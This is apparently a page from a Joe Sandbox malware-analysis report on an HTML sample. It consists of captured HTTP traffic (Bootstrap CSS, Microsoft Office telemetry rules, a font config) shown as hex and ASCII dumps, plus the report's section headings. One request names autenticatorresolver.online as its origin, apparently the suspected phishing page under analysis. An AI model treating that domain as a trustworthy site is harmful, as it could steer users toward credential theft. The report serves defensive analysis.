2024-11-26 12:43:32 UTC	632	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]\|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:33 UTC	629	OUT	GET /npm/bootstrap@5.0.2/dist/css/bootstrap.min.css HTTP/1.1 Host: cdn.jsdelivr.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://autenticatorresolver.online sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: style Referer: https://autenticatorresolver.online/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-26 12:43:34 UTC	763	IN	HTTP/1.1 200 OK Connection: close Content-Length: 155845 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: * Timing-Allow-Origin: * Cache-Control: public, max-age=31536000, s-maxage=31536000, immutable Cross-Origin-Resource-Policy: cross-origin X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Type: text/css; charset=utf-8 X-JSD-Version: 5.0.2 X-JSD-Version-Type: version ETag: W/"260c5-fByeBXPlzqi603M74vxjqoxo6o0" Accept-Ranges: bytes Date: Tue, 26 Nov 2024 12:43:34 GMT Age: 1759091 X-Served-By: cache-fra-eddf8230097-FRA, cache-nyc-kteb1890058-NYC X-Cache: HIT, HIT Vary: Accept-Encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 2f 2a 21 0a 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 35 2e 30 2e 32 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 32 31 20 54 77 69 74 74 65 72 2c 20 49 6e 63 2e 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 4c 49 43 45 4e 53 45 29 0a 20 2a 2f 3a 72 6f 6f 74 7b 2d 2d 62 73 2d 62 6c 75 65 3a 23 30 64 36 65 66 64 3b 2d Data Ascii: @charset "UTF-8";/! Bootstrap v5.0.2 (https://getbootstrap.com/) * Copyright 2011-2021 The Bootstrap Authors * Copyright 2011-2021 Twitter, Inc. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE) */:root{--bs-blue:#0d6efd;-
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 68 65 72 69 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 62 6f 72 64 65 72 3a 30 3b 6f 70 61 63 69 74 79 3a 2e 32 35 7d 68 72 3a 6e 6f 74 28 5b 73 69 7a 65 5d 29 7b 68 65 69 67 68 74 3a 31 70 78 7d 2e 68 31 2c 2e 68 32 2c 2e 68 33 2c 2e 68 34 2c 2e 68 35 2c 2e 68 36 2c 68 31 2c 68 32 2c 68 33 2c 68 34 2c 68 35 2c 68 36 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 2e 68 31 2c 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 33 37 35 72 65 6d 20 2b 20 31 2e 35 76 77 29 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 Data Ascii: herit;background-color:currentColor;border:0;opacity:.25}hr:not([size]){height:1px}.h1,.h2,.h3,.h4,.h5,.h6,h1,h2,h3,h4,h5,h6{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2}.h1,h1{font-size:calc(1.375rem + 1.5vw)}@media (min-width:1200px)
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 5b 63 6c 61 73 73 5d 29 2c 61 3a 6e 6f 74 28 5b 68 72 65 66 5d 29 3a 6e 6f 74 28 5b 63 6c 61 73 73 5d 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 63 6f 64 65 2c 6b 62 64 2c 70 72 65 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 76 61 72 28 2d 2d 62 73 2d 66 6f 6e 74 2d 6d 6f 6e 6f 73 70 61 63 65 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 64 69 72 65 63 74 69 6f 6e 3a 6c 74 72 3b 75 6e 69 63 6f 64 65 2d 62 69 64 69 3a 62 69 64 69 2d 6f 76 65 72 72 69 64 65 7d 70 72 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 6f 76 65 72 66 6c 6f 77 3a 61 75 74 6f 3b 66 6f 6e 74 Data Ascii: [class]),a:not([href]):not([class]):hover{color:inherit;text-decoration:none}code,kbd,pre,samp{font-family:var(--bs-font-monospace);font-size:1em;direction:ltr;unicode-bidi:bidi-override}pre{display:block;margin-top:0;margin-bottom:1rem;overflow:auto;font
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 2c 62 75 74 74 6f 6e 3a 6e 6f 74 28 3a 64 69 73 61 62 6c 65 64 29 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 74 65 78 74 61 72 65 61 7b 72 65 73 69 7a 65 3a 76 65 72 74 69 63 61 6c 7d 66 69 65 6c 64 73 65 74 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 62 6f 72 64 65 72 3a 30 7d 6c 65 67 65 6e 64 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 32 37 35 72 65 6d Data Ascii: not(:disabled),button:not(:disabled){cursor:pointer}::-moz-focus-inner{padding:0;border-style:none}textarea{resize:vertical}fieldset{min-width:0;padding:0;margin:0;border:0}legend{float:left;width:100%;padding:0;margin-bottom:.5rem;font-size:calc(1.275rem
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 63 28 31 2e 35 32 35 72 65 6d 20 2b 20 33 2e 33 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 63 61 6c 63 28 31 2e 34 37 35 72 65 6d 20 2b 20 32 2e 37 76 77 29 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 33 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 32 30 30 70 78 29 7b 2e 64 69 73 70 6c 61 79 2d 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 2e 35 72 65 6d 7d 7d 2e 64 69 73 70 6c 61 79 2d 35 7b 66 6f 6e 74 2d 73 69 7a Data Ascii: c(1.525rem + 3.3vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-3{font-size:4rem}}.display-4{font-size:calc(1.475rem + 2.7vw);font-weight:300;line-height:1.2}@media (min-width:1200px){.display-4{font-size:3.5rem}}.display-5{font-siz
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 2e 37 35 72 65 6d 29 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 76 61 72 28 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 2c 2e 37 35 72 65 6d 29 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 35 34 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6e 74 61 69 6e 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 6d 64 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 7b 6d 61 78 2d 77 69 64 74 68 3a 37 32 30 70 78 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 39 39 32 70 78 29 7b Data Ascii: .75rem);padding-left:var(--bs-gutter-x,.75rem);margin-right:auto;margin-left:auto}@media (min-width:576px){.container,.container-sm{max-width:540px}}@media (min-width:768px){.container,.container-md,.container-sm{max-width:720px}}@media (min-width:992px){
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 73 6d 2d 36 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 36 2e 36 36 36 36 36 36 36 36 36 37 25 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 7b 66 6c 65 78 3a 31 Data Ascii: -2>{flex:0 0 auto;width:50%}.row-cols-sm-3>{flex:0 0 auto;width:33.3333333333%}.row-cols-sm-4>{flex:0 0 auto;width:25%}.row-cols-sm-5>{flex:0 0 auto;width:20%}.row-cols-sm-6>*{flex:0 0 auto;width:16.6666666667%}}@media (min-width:768px){.col-md{flex:1
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 31 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 32 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 33 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 33 33 2e 33 33 33 33 33 33 33 33 33 33 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 34 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 35 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 35 3e 2a 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 32 30 25 7d 2e 72 6f 77 2d 63 6f 6c 73 2d 78 78 6c 2d 36 3e 2a 7b 66 6c 65 Data Ascii: ;width:auto}.row-cols-xxl-1>{flex:0 0 auto;width:100%}.row-cols-xxl-2>{flex:0 0 auto;width:50%}.row-cols-xxl-3>{flex:0 0 auto;width:33.3333333333%}.row-cols-xxl-4>{flex:0 0 auto;width:25%}.row-cols-xxl-5>{flex:0 0 auto;width:20%}.row-cols-xxl-6>{fle
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 2e 67 78 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 34 2c 2e 67 79 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 35 2c 2e 67 78 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 35 2c 2e 67 79 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 35 37 36 70 78 29 7b 2e 63 6f 6c 2d 73 6d 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 73 6d 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f 6c 2d 73 6d 2d 32 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 31 Data Ascii: .gx-4{--bs-gutter-x:1.5rem}.g-4,.gy-4{--bs-gutter-y:1.5rem}.g-5,.gx-5{--bs-gutter-x:3rem}.g-5,.gy-5{--bs-gutter-y:3rem}@media (min-width:576px){.col-sm-auto{flex:0 0 auto;width:auto}.col-sm-1{flex:0 0 auto;width:8.33333333%}.col-sm-2{flex:0 0 auto;width:1
2024-11-26 12:43:34 UTC	1378	IN	Data Raw: 2d 73 6d 2d 34 2c 2e 67 78 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 34 2c 2e 67 79 2d 73 6d 2d 34 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 31 2e 35 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 78 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 78 3a 33 72 65 6d 7d 2e 67 2d 73 6d 2d 35 2c 2e 67 79 2d 73 6d 2d 35 7b 2d 2d 62 73 2d 67 75 74 74 65 72 2d 79 3a 33 72 65 6d 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 36 38 70 78 29 7b 2e 63 6f 6c 2d 6d 64 2d 61 75 74 6f 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 61 75 74 6f 7d 2e 63 6f 6c 2d 6d 64 2d 31 7b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 38 2e 33 33 33 33 33 33 33 33 25 7d 2e 63 6f Data Ascii: -sm-4,.gx-sm-4{--bs-gutter-x:1.5rem}.g-sm-4,.gy-sm-4{--bs-gutter-y:1.5rem}.g-sm-5,.gx-sm-5{--bs-gutter-x:3rem}.g-sm-5,.gy-sm-5{--bs-gutter-y:3rem}}@media (min-width:768px){.col-md-auto{flex:0 0 auto;width:auto}.col-md-1{flex:0 0 auto;width:8.33333333%}.co

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-11-26 12:43:34 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=221871 Date: Tue, 26 Nov 2024 12:43:34 GMT Content-Length: 55 Connection: close X-CID: 2
2024-11-26 12:43:34 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Technical Details & Profile Illustrations for This#U00a0Drygair.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 106

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 114

Chrome Cache Entry: 115

Chrome Cache Entry: 116

Chrome Cache Entry: 117

Chrome Cache Entry: 118

Chrome Cache Entry: 119

Chrome Cache Entry: 120

Chrome Cache Entry: 121

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 124

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Windows Analysis Report
Technical Details & Profile Illustrations for This#U00a0Drygair.html

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	192	OUT	GET /rules/rule120618v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:35 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:34 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT ETag: "0x8DC582B9018290B" x-ms-request-id: dc0e488f-901e-005b-3891-3f2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124334Z-174f78459688l8rvhC1EWRtzr0000000082g00000000535a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:35 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	192	OUT	GET /rules/rule120615v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:35 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:34 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT ETag: "0x8DC582BBAD04B7B" x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124334Z-174f7845968j6t2phC1EWRcfe80000000vng0000000053kd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:35 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	192	OUT	GET /rules/rule120617v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-26 12:43:35 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 26 Nov 2024 12:43:34 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT ETag: "0x8DC582BA310DA18" x-ms-request-id: c665a67d-901e-002a-1b91-3f7a27000000 x-ms-version: 2018-03-28 x-azure-ref: 20241126T124334Z-174f7845968cdxdrhC1EWRg0en0000000vf0000000003yec x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-26 12:43:35 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Timestamp	Bytes transferred	Direction	Data
2024-11-26 12:43:34 UTC	192	OUT	GET /rules/rule120616v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
